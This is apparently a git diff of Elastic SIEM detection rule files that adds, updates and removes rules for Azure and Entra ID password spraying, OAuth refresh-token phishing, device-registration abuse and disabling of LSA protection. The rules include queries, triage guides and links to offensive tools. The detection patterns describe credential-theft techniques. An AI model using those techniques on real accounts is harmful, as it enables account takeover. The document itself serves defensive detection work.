VALUES(azure.signinlogs.properties.resource_display_name),\n conditional_access_status = VALUES(azure.signinlogs.properties.conditional_access_status),\n device_detail_browser = VALUES(azure.signinlogs.properties.device_detail.browser),\n device_detail_device_id = VALUES(azure.signinlogs.properties.device_detail.device_id),\n incoming_token_type = VALUES(azure.signinlogs.properties.incoming_token_type),\n risk_state = VALUES(azure.signinlogs.properties.risk_state),\n session_id = VALUES(azure.signinlogs.properties.session_id),\n user_id = VALUES(azure.signinlogs.properties.user_id),\n user_principal_name = VALUES(azure.signinlogs.properties.user_principal_name),\n result_description = VALUES(azure.signinlogs.result_description),\n result_signature = VALUES(azure.signinlogs.result_signature),\n result_type = VALUES(azure.signinlogs.result_type),\n\n unique_users = COUNT_DISTINCT(user_id),\n user_id_list = VALUES(user_id),\n login_errors = VALUES(login_error),\n unique_login_errors = COUNT_DISTINCT(login_error),\n request_types = VALUES(request_type),\n app_names = VALUES(app_name),\n ip_list = VALUES(ip),\n unique_ips = COUNT_DISTINCT(ip),\n source_orgs = VALUES(asn_org),\n countries = VALUES(country),\n unique_country_count = COUNT_DISTINCT(country),\n unique_asn_orgs = COUNT_DISTINCT(asn_org),\n first_seen = MIN(event_time),\n last_seen = MAX(event_time),\n total_attempts = COUNT()\n BY time_window\n\n| EVAL\n duration_seconds = DATE_DIFF(\"seconds\", first_seen, last_seen),\n bf_type = CASE(\n unique_users >= 15 AND unique_login_errors == 1 AND total_attempts >= 10 AND duration_seconds <= 1800, \"password_spraying\",\n unique_users >= 8 AND total_attempts >= 15 AND unique_login_errors <= 3 AND unique_ips <= 5 AND duration_seconds <= 600, \"credential_stuffing\",\n unique_users == 1 AND unique_login_errors == 1 AND total_attempts >= 30 AND duration_seconds <= 300, \"password_guessing\",\n \"other\"\n )\n\n| KEEP\n time_window, bf_type, duration_seconds, total_attempts, first_seen, last_seen,\n unique_users, user_id_list, login_errors, unique_login_errors, request_types,\n app_names, ip_list, unique_ips, source_orgs, countries,\n unique_country_count, unique_asn_orgs,\n\n authentication_requirement, client_app_id, client_app_display_name,\n target_resource_id, target_resource_display_name, conditional_access_status,\n device_detail_browser, device_detail_device_id, incoming_token_type,\n risk_state, session_id, user_id, user_principal_name,\n result_description, result_signature, result_type\n\n| WHERE bf_type != \"other\"\n", - "references": [ - "https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying", - "https://learn.microsoft.com/en-us/security/operations/incident-response-playbook-password-spray", - "https://learn.microsoft.com/en-us/purview/audit-log-detailed-properties", - "https://securityscorecard.com/research/massive-botnet-targets-m365-with-stealthy-password-spraying-attacks/", - "https://learn.microsoft.com/en-us/entra/identity-platform/reference-error-codes", - "https://github.com/0xZDH/Omnispray", - "https://github.com/0xZDH/o365spray" - ], - "risk_score": 47, - "rule_id": "35ab3cfa-6c67-11ef-ab4d-f661ea17fbcc", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Domain: SaaS", - "Data Source: Azure", - "Data Source: Entra ID", - "Data Source: Entra ID Sign-in", - "Use Case: Identity and Access Audit", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1110", - "name": "Brute Force", - "reference": "https://attack.mitre.org/techniques/T1110/", - "subtechnique": [ - { - "id": "T1110.001", - "name": "Password Guessing", - "reference": "https://attack.mitre.org/techniques/T1110/001/" - }, - { - "id": "T1110.003", - "name": "Password Spraying", - "reference": "https://attack.mitre.org/techniques/T1110/003/" - }, - { - "id": "T1110.004", - "name": "Credential Stuffing", - "reference": "https://attack.mitre.org/techniques/T1110/004/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 104 - }, - "id": "35ab3cfa-6c67-11ef-ab4d-f661ea17fbcc_104", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/35ab3cfa-6c67-11ef-ab4d-f661ea17fbcc_107.json b/packages/security_detection_engine/kibana/security_rule/35ab3cfa-6c67-11ef-ab4d-f661ea17fbcc_107.json index edc9f3575bc..083ea8341d6 100644 --- a/packages/security_detection_engine/kibana/security_rule/35ab3cfa-6c67-11ef-ab4d-f661ea17fbcc_107.json +++ b/packages/security_detection_engine/kibana/security_rule/35ab3cfa-6c67-11ef-ab4d-f661ea17fbcc_107.json @@ -23,6 +23,12 @@ "https://github.com/0xZDH/Omnispray", "https://github.com/0xZDH/o365spray" ], + "related_integrations": [ + { + "package": "azure", + "version": "^1.0.0" + } + ], "risk_score": 47, "rule_id": "35ab3cfa-6c67-11ef-ab4d-f661ea17fbcc", "severity": "medium", diff --git a/packages/security_detection_engine/kibana/security_rule/36188365-f88f-4f70-8c1d-0b9554186b9c_1.json b/packages/security_detection_engine/kibana/security_rule/36188365-f88f-4f70-8c1d-0b9554186b9c_1.json deleted file mode 100644 index 3d6aec26088..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/36188365-f88f-4f70-8c1d-0b9554186b9c_1.json +++ /dev/null @@ -1,60 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies sign-ins on behalf of a principal user to the Microsoft Graph API from multiple IPs using the Microsoft Authentication Broker or Visual Studio Code application. This behavior may indicate an adversary using a phished OAuth refresh token.", - "from": "now-1h", - "language": "esql", - "license": "Elastic License v2", - "name": "Suspicious Microsoft 365 UserLoggedIn via OAuth Code", - "note": "## Triage and analysis\n\n### Investigating Suspicious Microsoft 365 UserLoggedIn via OAuth Code\n\n### Possible Investigation Steps:\n\n- `o365.audit.UserId`: The identity value the application is acting on behalf of principal user.\n- `unique_ips`: Analyze the list of unique IP addresses used within the 30-minute window. Determine whether these originate from different geographic regions, cloud providers, or anonymizing infrastructure (e.g., Tor or VPNs).\n- `target_time_window`: Use the truncated time window to pivot into raw events to reconstruct the full sequence of resource access events, including exact timestamps and service targets.\n- `azure.auditlogs` to check for device join or registration events around the same timeframe.\n- `azure.identityprotection` to identify correlated risk detections, such as anonymized IP access or token replay.\n- Any additional sign-ins from the `ips` involved, even outside the broker, to determine if tokens have been reused elsewhere.\n\n### False Positive Analysis\n\n- Developers or IT administrators working across environments may also produce similar behavior.\n\n### Response and Remediation\n\n- If confirmed unauthorized, revoke all refresh tokens for the affected user and remove any devices registered during this session.\n- Notify the user and determine whether the device join or authentication activity was expected.\n- Audit Conditional Access and broker permissions (`29d9ed98-a469-4536-ade2-f981bc1d605e`) to ensure policies enforce strict access controls.\n- Consider blocking token-based reauthentication to Microsoft Graph and DRS from suspicious locations or user agents.\n- Continue monitoring for follow-on activity like lateral movement or privilege escalation.\n", - "query": "from logs-o365.audit-default*\n| WHERE event.dataset == \"o365.audit\" and event.action == \"UserLoggedIn\" and\n source.ip is not null and o365.audit.UserId is not null and o365.audit.ApplicationId is not null and o365.audit.UserType in (\"0\", \"2\", \"3\", \"10\") and \n\n // filter for successful logon to Microsoft Graph and from the Microsoft Authentication Broker or Visual Studio Code\n o365.audit.ApplicationId in (\"aebc6443-996d-45c2-90f0-388ff96faa56\", \"29d9ed98-a469-4536-ade2-f981bc1d605e\") and\n o365.audit.ObjectId in (\"00000003-0000-0000-c000-000000000000\")\n\n// keep relevant fields only\n| keep @timestamp, o365.audit.UserId, source.ip, o365.audit.ApplicationId, o365.audit.ObjectId, o365.audit.ExtendedProperties.RequestType, source.as.organization.name, o365.audit.ExtendedProperties.ResultStatusDetail\n\n// case statements to track which are OAuth2 authorization request via redirect and which are related to OAuth2 code to token conversion\n| eval oauth_authorize = case(o365.audit.ExtendedProperties.RequestType == \"OAuth2:Authorize\" and o365.audit.ExtendedProperties.ResultStatusDetail == \"Redirect\", o365.audit.UserId, null), oauth_token = case(o365.audit.ExtendedProperties.RequestType == \"OAuth2:Token\", o365.audit.UserId, null)\n\n// split time to 30 minutes intervals\n| eval target_time_window = DATE_TRUNC(30 minutes, @timestamp)\n\n// aggregate by principal, applicationId, objectId and time window\n| stats unique_ips = COUNT_DISTINCT(source.ip), source_ips = VALUES(source.ip), appIds = VALUES(o365.audit.ApplicationId), asn = values(`source.as.organization.name`), is_oauth_token = COUNT_DISTINCT(oauth_token), is_oauth_authorize = COUNT_DISTINCT(oauth_authorize) by o365.audit.UserId, target_time_window, o365.audit.ApplicationId, o365.audit.ObjectId\n\n// filter for cases where the same appId is used by the same principal user to access the same object and from multiple addresses via OAuth2 token\n| where unique_ips >= 2 and is_oauth_authorize > 0 and is_oauth_token > 0\n", - "references": [ - "https://www.volexity.com/blog/2025/04/22/phishing-for-codes-russian-threat-actors-target-microsoft-365-oauth-workflows/", - "https://github.com/dirkjanm/ROADtools", - "https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/" - ], - "risk_score": 73, - "rule_id": "36188365-f88f-4f70-8c1d-0b9554186b9c", - "setup": "## Setup\n\nThe Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n", - "severity": "high", - "tags": [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Use Case: Identity and Access Audit", - "Use Case: Threat Detection", - "Resources: Investigation Guide", - "Tactic: Defense Evasion" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1550", - "name": "Use Alternate Authentication Material", - "reference": "https://attack.mitre.org/techniques/T1550/", - "subtechnique": [ - { - "id": "T1550.001", - "name": "Application Access Token", - "reference": "https://attack.mitre.org/techniques/T1550/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 1 - }, - "id": "36188365-f88f-4f70-8c1d-0b9554186b9c_1", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/36188365-f88f-4f70-8c1d-0b9554186b9c_4.json b/packages/security_detection_engine/kibana/security_rule/36188365-f88f-4f70-8c1d-0b9554186b9c_4.json index ec7be5ef2a0..af3e8ac515d 100644 --- a/packages/security_detection_engine/kibana/security_rule/36188365-f88f-4f70-8c1d-0b9554186b9c_4.json +++ b/packages/security_detection_engine/kibana/security_rule/36188365-f88f-4f70-8c1d-0b9554186b9c_4.json @@ -16,6 +16,12 @@ "https://github.com/dirkjanm/ROADtools", "https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/" ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], "risk_score": 73, "rule_id": "36188365-f88f-4f70-8c1d-0b9554186b9c", "setup": "## Setup\n\nThe Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n", diff --git a/packages/security_detection_engine/kibana/security_rule/375132c6-25d5-11f0-8745-f661ea17fbcd_1.json b/packages/security_detection_engine/kibana/security_rule/375132c6-25d5-11f0-8745-f661ea17fbcd_1.json deleted file mode 100644 index 6c0339644db..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/375132c6-25d5-11f0-8745-f661ea17fbcd_1.json +++ /dev/null @@ -1,88 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies suspicious activity from the Microsoft Authentication Broker in Microsoft Entra ID sign-in logs. This behavior may indicate an adversary using a phished OAuth refresh token or a Primary Refresh Token (PRT) to register a device and access Microsoft services as a user. The pattern includes sign-ins from multiple IPs across services (Microsoft Graph, DRS, AAD) using the Authentication Broker client on behalf of a principal user.", - "false_positives": [ - "Legitimate device registrations using Microsoft Authentication Broker may occur during corporate enrollment scenarios or bulk provisioning, but it is uncommon for multiple source IPs to register the same identity across Microsoft Graph, Device Registration Service (DRS), and Azure Active Directory (AAD) in a short time span." - ], - "from": "now-1h", - "language": "esql", - "license": "Elastic License v2", - "name": "Suspicious Activity via Auth Broker On-Behalf-of Principal User", - "note": "## Triage and analysis\n\n### Investigating Suspicious Activity via Auth Broker On-Behalf-of Principal User\n\nThis rule identifies suspicious activity from the Microsoft Authentication Broker where the same identity accesses Microsoft Graph at least twice and either Device Registration Service (DRS) or Azure Active Directory (AAD) once \u2014 all from multiple unique source IPs within a short window. This behavior may indicate the use of a previously phished refresh token to impersonate a user and register a device, followed by an attempt to acquire a Primary Refresh Token (PRT) for persistent access.\n\n### Possible Investigation Steps:\n\n- `target`: The user principal name targeted by the authentication broker. Investigate whether this user has recently registered a device, signed in from new IPs, or has had recent password resets or MFA changes.\n- `azure.signinlogs.identity`: The identity value the broker is acting on behalf of. This may be useful when correlating to device registration records or audit events tied to object IDs.\n- `ips`: Analyze the list of unique IP addresses used within the 30-minute window. Determine whether these originate from different geographic regions, cloud providers, or anonymizing infrastructure (e.g., Tor or VPNs).\n- `incoming_token_type`: Look for values like `\"refreshToken\"` or `\"none\"`, which may indicate token replay. `\"refreshToken\"` suggests broker-based reauthentication using stolen credentials.\n- `user_agents`: Check for mixed user agent strings. Automation tools (e.g., `python-requests`) alongside browser-based agents (e.g., Chrome on macOS) may indicate scripted misuse of tokens.\n- `OS`: Review for inconsistencies. For example, if both `Windows` and `MacOs` appear during a short time span for the same user, this may point to token abuse across multiple environments.\n- `target_time_window`: Use the truncated time window to pivot into raw `azure.signinlogs` to reconstruct the full sequence of resource access events, including exact timestamps and service targets.\n- `azure.auditlogs` to check for device join or registration events around the same timeframe.\n- `azure.identityprotection` to identify correlated risk detections, such as anonymized IP access or token replay.\n- Any additional sign-ins from the `ips` involved, even outside the broker, to determine if tokens have been reused elsewhere.\n\n### False Positive Analysis\n\n- This pattern may occur if the user is registering a new device legitimately from two networks (e.g., mobile hotspot and home).\n- Security software (e.g., endpoint detection tools) or identity clients may produce rapid Graph and DRS access in rare edge cases.\n- Developers or IT administrators working across environments may also produce similar behavior.\n\n### Response and Remediation\n\n- If confirmed unauthorized, revoke all refresh tokens for the affected user and remove any devices registered during this session.\n- Notify the user and determine whether the device join or authentication activity was expected.\n- Audit Conditional Access and broker permissions (`29d9ed98-a469-4536-ade2-f981bc1d605e`) to ensure policies enforce strict access controls.\n- Consider blocking token-based reauthentication to Microsoft Graph and DRS from suspicious locations or user agents.\n- Continue monitoring for follow-on activity like lateral movement or privilege escalation.\n", - "query": "FROM logs-azure.signinlogs* metadata _id, _version, _index\n\n// filter for Microsoft Entra ID Sign-in Logs\n| where event.dataset == \"azure.signinlogs\"\n\n // filters on member principals, excluding service principals\n and azure.signinlogs.properties.user_type == \"Member\"\n and source.ip is not null\n and azure.signinlogs.identity is not null\n and azure.signinlogs.properties.user_principal_name is not null\n and event.outcome == \"success\"\n\n // filter for successful sign-ins to Microsoft Graph and DRS/AAD from the Microsoft Authentication Broker\n and (azure.signinlogs.properties.app_display_name == \"Microsoft Authentication Broker\" or azure.signinlogs.properties.app_id == \"29d9ed98-a469-4536-ade2-f981bc1d605e\")\n and azure.signinlogs.properties.resource_display_name in (\"Device Registration Service\", \"Microsoft Graph\", \"Windows Azure Active Directory\")\n\n// keep relevant fields\n| keep @timestamp, azure.signinlogs.identity, source.ip, azure.signinlogs.properties.app_display_name, azure.signinlogs.properties.resource_display_name, azure.signinlogs.properties.user_principal_name, azure.signinlogs.properties.incoming_token_type, user_agent.original, azure.signinlogs.properties.device_detail.operating_system\n\n// aggregate by 30-minute time window\n| eval target_time_window = DATE_TRUNC(30 minutes, @timestamp)\n\n// case statements to track which are MS Graph, DRS, and AAD access\n| eval ms_graph = case(azure.signinlogs.properties.resource_display_name == \"Microsoft Graph\", source.ip, null), drs = case(azure.signinlogs.properties.resource_display_name == \"Device Registration Service\", source.ip, null), aad = case(azure.signinlogs.properties.resource_display_name == \"Windows Azure Active Directory\", source.ip, null)\n\n// aggregate by principal and time window\n// store token types, target user, unique source IPs, and user agents in arrays for investigation\n| stats is_ms_graph = COUNT_DISTINCT(ms_graph), is_drs = COUNT_DISTINCT(drs), is_aad = COUNT_DISTINCT(aad), unique_src_ip = COUNT_DISTINCT(source.ip), ips = VALUES(source.ip), incoming_token_type = VALUES(azure.signinlogs.properties.incoming_token_type), target = VALUES(azure.signinlogs.properties.user_principal_name), user_agents = VALUES(user_agent.original), OS = VALUES(azure.signinlogs.properties.device_detail.operating_system) by azure.signinlogs.identity, target_time_window\n\n// filter for cases with multiple unique source IPs, and at least one DRS or AAD access, and multiple MS Graph accesses\n| where unique_src_ip >= 2 and (is_drs >= 1 or is_aad >= 1) and is_ms_graph >= 2\n", - "references": [ - "https://www.volexity.com/blog/2025/04/22/phishing-for-codes-russian-threat-actors-target-microsoft-365-oauth-workflows/", - "https://github.com/dirkjanm/ROADtools", - "https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/" - ], - "risk_score": 73, - "rule_id": "375132c6-25d5-11f0-8745-f661ea17fbcd", - "setup": "#### Required Microsoft Entra ID Sign-In Logs\nThis rule requires the Microsoft Entra ID Sign-In Logs integration be enabled and configured to collect sign-in logs. In Entra ID, sign-in logs must be enabled and streaming to the Event Hub used for the Azure integration.\n", - "severity": "high", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Data Source: Entra ID", - "Data Source: Entra ID Sign-in Logs", - "Use Case: Identity and Access Audit", - "Use Case: Threat Detection", - "Resources: Investigation Guide", - "Tactic: Defense Evasion", - "Tactic: Persistence" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1550", - "name": "Use Alternate Authentication Material", - "reference": "https://attack.mitre.org/techniques/T1550/", - "subtechnique": [ - { - "id": "T1550.001", - "name": "Application Access Token", - "reference": "https://attack.mitre.org/techniques/T1550/001/" - } - ] - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1098", - "name": "Account Manipulation", - "reference": "https://attack.mitre.org/techniques/T1098/", - "subtechnique": [ - { - "id": "T1098.005", - "name": "Device Registration", - "reference": "https://attack.mitre.org/techniques/T1098/005/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 1 - }, - "id": "375132c6-25d5-11f0-8745-f661ea17fbcd_1", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/375132c6-25d5-11f0-8745-f661ea17fbcd_4.json b/packages/security_detection_engine/kibana/security_rule/375132c6-25d5-11f0-8745-f661ea17fbcd_4.json index 493fd4c7227..7e5313c3874 100644 --- a/packages/security_detection_engine/kibana/security_rule/375132c6-25d5-11f0-8745-f661ea17fbcd_4.json +++ b/packages/security_detection_engine/kibana/security_rule/375132c6-25d5-11f0-8745-f661ea17fbcd_4.json @@ -19,6 +19,12 @@ "https://github.com/dirkjanm/ROADtools", "https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/" ], + "related_integrations": [ + { + "package": "azure", + "version": "^1.0.0" + } + ], "risk_score": 73, "rule_id": "375132c6-25d5-11f0-8745-f661ea17fbcd", "setup": "#### Required Microsoft Entra ID Sign-In Logs\nThis rule requires the Microsoft Entra ID Sign-In Logs integration be enabled and configured to collect sign-in logs. In Entra ID, sign-in logs must be enabled and streaming to the Event Hub used for the Azure integration.\n", diff --git a/packages/security_detection_engine/kibana/security_rule/37994bca-0611-4500-ab67-5588afe73b77_106.json b/packages/security_detection_engine/kibana/security_rule/37994bca-0611-4500-ab67-5588afe73b77_106.json deleted file mode 100644 index 25876b7a045..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/37994bca-0611-4500-ab67-5588afe73b77_106.json +++ /dev/null @@ -1,85 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic", - "Willem D'Haese" - ], - "description": "Identifies high risk Azure Active Directory (AD) sign-ins by leveraging Microsoft's Identity Protection machine learning and heuristics. Identity Protection categorizes risk into three tiers: low, medium, and high. While Microsoft does not provide specific details about how risk is calculated, each level brings higher confidence that the user or sign-in is compromised.", - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure Active Directory High Risk Sign-in", - "note": "## Triage and analysis\n\n### Investigating Azure Active Directory High Risk Sign-in\n\nMicrosoft Identity Protection is an Azure AD security tool that detects various types of identity risks and attacks.\n\nThis rule identifies events produced by Microsoft Identity Protection with high risk levels or high aggregated risk level.\n\n#### Possible investigation steps\n\n- Identify the Risk Detection that triggered the event. A list with descriptions can be found [here](https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#risk-types-and-detection).\n- Identify the user account involved and validate whether the suspicious activity is normal for that user.\n - Consider the source IP address and geolocation for the involved user account. Do they look normal?\n - Consider the device used to sign in. Is it registered and compliant?\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Check if this operation was approved and performed according to the organization's change management policy.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services, and data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\nIf this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and device conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users.\n- Consider enabling multi-factor authentication for users.\n- Follow security best practices [outlined](https://docs.microsoft.com/en-us/azure/security/fundamentals/identity-management-best-practices) by Microsoft.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "event.dataset:azure.signinlogs and\n (azure.signinlogs.properties.risk_level_during_signin:high or azure.signinlogs.properties.risk_level_aggregated:high) and\n event.outcome:(success or Success)\n", - "references": [ - "https://docs.microsoft.com/en-us/azure/active-directory/conditional-access/howto-conditional-access-policy-risk", - "https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/overview-identity-protection", - "https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/howto-identity-protection-investigate-risk" - ], - "related_integrations": [ - { - "package": "azure", - "version": "^1.22.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.signinlogs.properties.risk_level_aggregated", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.signinlogs.properties.risk_level_during_signin", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 73, - "rule_id": "37994bca-0611-4500-ab67-5588afe73b77", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n\nNote that details for `azure.signinlogs.properties.risk_level_during_signin` and `azure.signinlogs.properties.risk_level_aggregated`\nare only available for Azure AD Premium P2 customers. All other customers will be returned `hidden`.", - "severity": "high", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Identity and Access Audit", - "Resources: Investigation Guide", - "Tactic: Initial Access" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0001", - "name": "Initial Access", - "reference": "https://attack.mitre.org/tactics/TA0001/" - }, - "technique": [ - { - "id": "T1078", - "name": "Valid Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 106 - }, - "id": "37994bca-0611-4500-ab67-5588afe73b77_106", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/37cb6756-8892-4af3-a6bd-ddc56db0069d_3.json b/packages/security_detection_engine/kibana/security_rule/37cb6756-8892-4af3-a6bd-ddc56db0069d_3.json new file mode 100644 index 00000000000..5e1686c17f4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/37cb6756-8892-4af3-a6bd-ddc56db0069d_3.json @@ -0,0 +1,125 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "LSA protecton is provided to prevent nonprotected processes from reading memory and injecting code. This feature provides added security for the credentials that LSA stores and manages. Adversaries may modify the RunAsPPL registry and wait or initiate a system restart to enable Lsass credentials access.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.registry-*", + "logs-windows.sysmon_operational-*", + "endgame-*", + "logs-m365_defender.event-*", + "logs-sentinel_one_cloud_funnel.*", + "logs-crowdstrike.fdr*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Disabling Lsa Protection via Registry Modification", + "note": "## Triage and analysis\n\n### Investigating Disabling Lsa Protection via Registry Modification\n\nFor more information about the Lsa Protection and how it works, check the [official Microsoft docs page](https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection).\n\nAttackers may disable Lsa protection to access Lsass memory for credentals. This rule identifies RunAsPPL registry value modifications.\n\n#### Possible investigation steps\n\n- Verify the context of the change and if it's related to a planned system administration activity.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behaviors in the alert timeframe.\n- Investigate abnormal behaviors observed by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n\n### False positive analysis\n\n- Approved changes to relax the Lsa protection for compatibility with third party solutions such as authentication plugins or alike.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restore UAC settings to the desired state.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and event.type == \"change\" and\n registry.data.strings != null and registry.value : \"RunAsPPL\" and\n registry.path : \"*\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Lsa\\\\RunAsPPL\" and\n not registry.data.strings : (\"1\", \"0x00000001\", \"2\", \"0x00000002\")\n", + "references": [ + "https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^3.0.0" + }, + { + "package": "m365_defender", + "version": "^3.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.0.0" + }, + { + "package": "crowdstrike", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.value", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "37cb6756-8892-4af3-a6bd-ddc56db0069d", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Data Source: Crowdstrike" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + }, + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "37cb6756-8892-4af3-a6bd-ddc56db0069d_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/38e5acdd-5f20-4d99-8fe4-f0a1a592077f_103.json b/packages/security_detection_engine/kibana/security_rule/38e5acdd-5f20-4d99-8fe4-f0a1a592077f_103.json deleted file mode 100644 index 37a73905d22..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/38e5acdd-5f20-4d99-8fe4-f0a1a592077f_103.json +++ /dev/null @@ -1,77 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies when a user is added as an owner for an Azure service principal. The service principal object defines what the application can do in the specific tenant, who can 